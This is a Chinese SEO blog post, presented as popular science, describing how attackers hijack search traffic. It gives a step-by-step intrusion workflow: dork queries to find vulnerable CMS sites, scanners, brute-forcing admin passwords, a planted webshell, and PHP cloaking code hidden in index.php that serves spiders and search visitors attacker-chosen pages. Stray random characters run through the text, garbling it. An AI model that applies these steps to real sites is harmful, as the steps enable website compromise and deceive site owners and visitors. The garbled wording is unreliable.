瓜瓜只是科普

并不想教壞你們只磷。经磅。。

看到標(biāo)題的時(shí)候钮追，不知道你們什么感覺预厌，是不是覺得麻瓜君一直在帶壞你們，把你們引入黑暗的深淵呢畏陕？

我們的目的只是為了科普配乓，探索我們不知道的東西而已，當(dāng)然還是進(jìn)入科普環(huán)節(jié)。犹芹。崎页。

在互聯(lián)網(wǎng)的世界里，其實(shí)流量劫持并不是什么件新鮮事腰埂。所謂流量劫持飒焦，無非就是指通過一定技術(shù)手段，控制你們的上網(wǎng)行為屿笼，讓你們打開不想打開的網(wǎng)頁牺荠，看到不想看的廣告，當(dāng)你們打開了之后驴一，你們的行為就會(huì)給劫持者帶去源源不斷的收入休雌。

什么意思呢？很簡單肝断。杈曲。。

明明打開的是www.magua12138.com網(wǎng)站胸懈，莫名其妙卻被跳轉(zhuǎn)至www.fzeme.com的網(wǎng)站担扑；明明想下的是A軟件，下載安裝后卻發(fā)現(xiàn)是B軟件趣钱；還有打開一個(gè)App涌献，彈出讓人心亂如麻的廣告，你們以為電腦手機(jī)中毒了首有？

我就呵呵了燕垃，錯(cuò)！或許你們真的錯(cuò)怪了病毒绞灼，因?yàn)檫@個(gè)時(shí)候你們的互聯(lián)網(wǎng)流量很可能被劫持了利术。

盡管這種現(xiàn)象很早就存在呈野，也有很多人杜絕或者厭惡低矮，但在“用戶就是小綿羊”的環(huán)境下，流量劫持始終“野火燒不盡被冒，春風(fēng)吹又生”军掂。

到底誰在劫持流量？

流量劫持背后的“惡魔之手”究竟什么樣昨悼？

根據(jù)《IT時(shí)報(bào)》記者調(diào)查發(fā)現(xiàn)蝗锥，在互聯(lián)網(wǎng)世界，流量劫持背后有一個(gè)龐大的灰色產(chǎn)業(yè)鏈率触，僅DNS劫持一種方式终议，每天被惡意劫持的流量至少有上千萬個(gè)IP。

今天我們話題就圍繞著“劫持”兩個(gè)字，隨便扯一扯穴张。细燎。。

劫持其實(shí)有很多皂甘，比如說什么玻驻，流量劫持、快照劫持偿枕、PR劫持等璧瞬，其實(shí)前幾個(gè)步驟都一樣，就是最后的腳本不同而已渐夸。嗤锉。。

我們按順序來墓塌，因?yàn)槭墙俪謩e人的站档冬，所以我們要做的第一步肯定是獲取劫持站的后臺(tái)權(quán)限，并留下后門桃纯，以便日后管理酷誓，這個(gè)過程就是常說的拿站（webshell）。

從難易度來說态坦，最容易的就是企業(yè)站了盐数，因?yàn)榇蠖鄶?shù)的企業(yè)站都是采用開源系統(tǒng)，很多系統(tǒng)因本身的問題存在諸多安全隱患伞梯，比如虐心的dede（我們常用的織夢CMS）玫氢。

有些系統(tǒng)的漏洞已經(jīng)曝光出來，找到這些漏洞的特征和這個(gè)漏洞對應(yīng)的系統(tǒng)谜诫，然后去各種渠道搜集使用這個(gè)系統(tǒng)的網(wǎng)站漾峡，遍歷掃描每個(gè)站，如果存在這個(gè)漏洞喻旷，就暴力破解后臺(tái)賬戶名和密碼生逸。

收集目標(biāo)網(wǎng)站，最簡單的方法是拿漏洞的特征做關(guān)鍵詞到搜索引擎去搜且预，然后把搜索結(jié)果頁上的網(wǎng)站全部抓下來槽袄。熟悉網(wǎng)站的瓜友肯定對下面的關(guān)鍵詞非常熟悉了比如說：

Powered by DEDECMS

inurl:HomeMarket.asp

有限公司--Powered by ASPCMS V2.0

用戶登陸 inurl:admin/login.asp。锋谐。遍尺。還有XXX技術(shù)支持等等

然后拿抓下來以后就可以對這些網(wǎng)站去進(jìn)行漏洞了，你們肯定一臉懵逼涮拗，是不是想問怎么掃描乾戏？

用很多現(xiàn)成的拿站工具可以完成批量的掃描和破解迂苛，然而每個(gè)工具不能能覆蓋所有漏洞，所以需要交叉使用：

御劍后臺(tái)掃描

wwwscan GUI版

web掃描工具-WVS

椰樹WEB漏洞掃描器

Pker多線程后臺(tái)極速掃描器

Web應(yīng)用安全漏洞檢測工具

Acunetix Web Vulnerability Scanner 8

如果過程順利的話鼓择，就可以拿到一些網(wǎng)站的后臺(tái)賬戶跟密碼了灾部，然后就可以正常登陸了。

這個(gè)時(shí)候你們就需要留一個(gè)后門惯退，在網(wǎng)站后臺(tái)新建一個(gè)php文件（用DW）赌髓，寫入一句話木馬：

，通過菜刀（一個(gè)非常好用而又強(qiáng)大的webshell管理軟件催跪，如“中國菜刀”）添加shell锁蠕，無異常的話就已經(jīng)順利的拿下一個(gè)站了。懊蒸、

接下來在后臺(tái)寫入劫持代碼荣倾，比如要劫持首頁，在后臺(tái)找一個(gè)很隱蔽的地方新建一個(gè)php文件骑丸，寫入類似的代碼：

$httpuser=strtolower($_SERVER['HTTP_USER_AGENT']);

if(strstr($httpuser,'Baiduspider') or strstr($httpuser,'Googlebot') or strstr($httpuser,'Sogou web spider')){

$url=‘http://www.magua121381.com';$a=file_get_contents($url);echo $a;exit;

}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);

if(strstr($httpuser,'baidu') or strstr($httpuser,'google') or strstr($httpuser,'sogou')){

$url=‘http://www.magua121382.com';header("Location:$url");exit;

}

?>

我們怎么去理解這句話呢舌仍？意思其實(shí)非常簡單，大致可以這么理解通危，若蜘蛛來訪铸豁，則抓取 www.magua121381.com的內(nèi)容；若來路為搜索引擎菊碟，則返回www.magua121382.com的內(nèi)容节芥，然后上傳到網(wǎng)站的根目錄。逆害。头镊。

之后在首頁文件index.php中調(diào)用剛才新建的文件：

include(“{新建文件的路徑}")

?>

當(dāng)然，www.magua121381.com 和 www.magua121382.com 可以設(shè)為同一個(gè)網(wǎng)址魄幕。（如果你們真這么設(shè)置相艇，你們做那么多的目的是什么= =）

這就是快照劫持的簡單步驟了，被劫持的站纯陨，對蜘蛛訪問返回www.magua121381.com的內(nèi)容坛芽，對從搜索引擎搜索過來的用戶返回www.magua121382.com的內(nèi)容，你如果輸入網(wǎng)站的域名（網(wǎng)站url）队丝，則是本來的頁面靡馁。一般負(fù)責(zé)網(wǎng)站管理的人欲鹏，都只輸入url訪問網(wǎng)站机久，index.php也很少關(guān)注，所以好長時(shí)間才發(fā)現(xiàn)赔嚎，甚至發(fā)現(xiàn)不了自己的網(wǎng)站被劫持膘盖。

有的時(shí)候在百度中搜索很多違禁的詞語胧弛，會(huì)出現(xiàn)一堆政府的網(wǎng)站，但是點(diǎn)進(jìn)去是卻看到各種違禁內(nèi)容（百度站長平臺(tái)還專門開了一個(gè)“bad case”的帖子專門收集類似的案例）侠畔，直接輸入網(wǎng)址訪問结缚，卻是正常的內(nèi)容，若果換一個(gè)搜索詞從百度點(diǎn)進(jìn)去软棺，還是正常的內(nèi)容红竭。這就是在剛才所說的劫持代碼的基礎(chǔ)上完成的，根據(jù)referer詞來判斷是否返回指定頁面喘落，現(xiàn)在百度已經(jīng)取消referer參數(shù)了茵宪，所以這東西也就隨之失效了，我們略過瘦棋。稀火。。

進(jìn)入下一個(gè)環(huán)節(jié)赌朋，PR劫持，就是對蜘蛛301到指定的網(wǎng)站沛慢，（301就不特別解釋了赡若，301重定向的意思，自己上網(wǎng)查一下）從而提升權(quán)重团甲。有些新站斩熊，做了不到1個(gè)月，用站長工具一查伐庭，哎喲我去粉渠，權(quán)重值都在4以上，但網(wǎng)站本身并沒多少內(nèi)容和收錄圾另，如果有看到這樣的情況霸株，基本是用了PR劫持了。集乔。去件。

簡單來說，PR值的計(jì)算是有周期的扰路，假如A網(wǎng)站的PR值是4尤溜，B網(wǎng)站是0，我們把A網(wǎng)站劫持到B網(wǎng)站汗唱，在PR值計(jì)算過后宫莱，在取消劫持，那么B網(wǎng)站就擁有了4的PR值哩罪，至少能保持到下次計(jì)算的時(shí)候授霸。巡验。。

最后說一個(gè)快照劫持碘耳，因?yàn)樽罱匆姷谋容^頻繁且很少人知道显设，利用JS腳本來霸屏搜索引擎。辛辨。捕捂。

怎么做到的？腳本怎么寫斗搞？

這樣改變世界的做法你們真的認(rèn)為很容易就能實(shí)現(xiàn)嗎绞蹦？

事實(shí)上的確很容易。榜旦。幽七。用一些軟件就可以了。

我們來看看這個(gè)軟件的搜索跳轉(zhuǎn)功能溅呢，支持各大搜索引擎澡屡，使從任意方式搜索出點(diǎn)擊到你網(wǎng)站后，搜索網(wǎng)站頁面自動(dòng)跳轉(zhuǎn)到指定的網(wǎng)站咐旧，自定義網(wǎng)站功能支持一級(jí)驶鹉，多級(jí)，長尾域名格式铣墨。優(yōu)化來路室埋，默認(rèn)百度，防止百度蜘蛛被k伊约。

這軟件還有一些奇特的功能姚淆，看圖不說話。屡律。腌逢。

手機(jī)也是可以的。超埋。搏讶。

這個(gè)軟件還真是喪心病狂阿。霍殴。媒惕。

建議很多玩搜索方面的瓜友如果是因?yàn)楹闷妫梢愿楣暇乃悸诽剿饕幌吕赐ィ侨绻菫榱俗约旱墓径饰担蛘呤亲约核诘钠髽I(yè)長遠(yuǎn)的考慮，建議不要運(yùn)用以上任何一種手法，到時(shí)候別說我沒提醒你們哦面睛。

今天我們僅僅科普下劫持原理絮蒿，還有很多的細(xì)節(jié)沒有展開說尊搬，比如批量管理webshell叁鉴，又比如說如何隱蔽蹤跡。

如果藏的不是非常隱蔽佛寿，基本都會(huì)被發(fā)現(xiàn)幌墓，只是時(shí)間長短問題，且作上去的排名都活不了太長時(shí)間冀泻，而且會(huì)帶來你意想不到的懲罰常侣，說白了，能獲得多大效果弹渔，取決于能鋪多少量胳施，是個(gè)耗費(fèi)精力、時(shí)間的力氣活肢专，所以還是專心研究白帽SEO吧舞肆。。博杖。

▼

若要轉(zhuǎn)載麻瓜君的文章

記得請署名噢...

投稿郵箱：

ceo@magua12138.com

關(guān)注微信公眾號(hào)

magua12139

更多內(nèi)容請登錄：

www.magua12138.com